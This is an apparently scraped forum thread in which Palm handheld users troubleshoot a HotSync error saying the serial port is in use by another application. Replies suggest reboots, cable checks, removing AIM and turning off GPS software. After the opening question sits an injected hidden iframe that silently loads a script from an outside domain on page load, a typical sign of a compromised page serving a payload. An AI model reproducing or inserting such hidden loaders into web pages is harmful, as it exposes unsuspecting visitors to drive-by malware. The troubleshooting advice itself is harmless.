HOTSYNC? Serial port is in use by another application

When I try and Hotsync this message pops up.

Hotsync Problem

Unable to intiate HOtsync operation because the serial port is in use by another application.

Can anyone help with this? The hotsync has always worked until now. Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

First off, I'm assuming you've already tried:
- rebooting the computer
- checking cables
- verifying you have the cable plugged into the correct serial port.

If you have done all of those, try using a different serial port. And, be sure you have Palm desktop 4.x

If that doesn't do it, let us know PC or Mac, if you're using cable or cradle, anything else out of the norm...

Try removing AIM

I am not certain if this is your problem, but try deleting AIM and resetting.

i have this problem as well....so i just unplug the serial cable from the pc then plug it back in. seems to fix the error.

Anyone here running a GPS or keyboard to their I300? When using the serial port on the 300 for a function such as these, the respective software must be switched off before syncing. If not, this message appears.

Actually i do have a gps, but i that serial port is unhooked becasue my the smsung phone port is hooked into it. ANd the gps program is not running. So now what?
It worked the other day and i have not done anything different to my computer.

next time that happens just do a soft boot of the phone, then if you still have the problem, soft boot the PC..
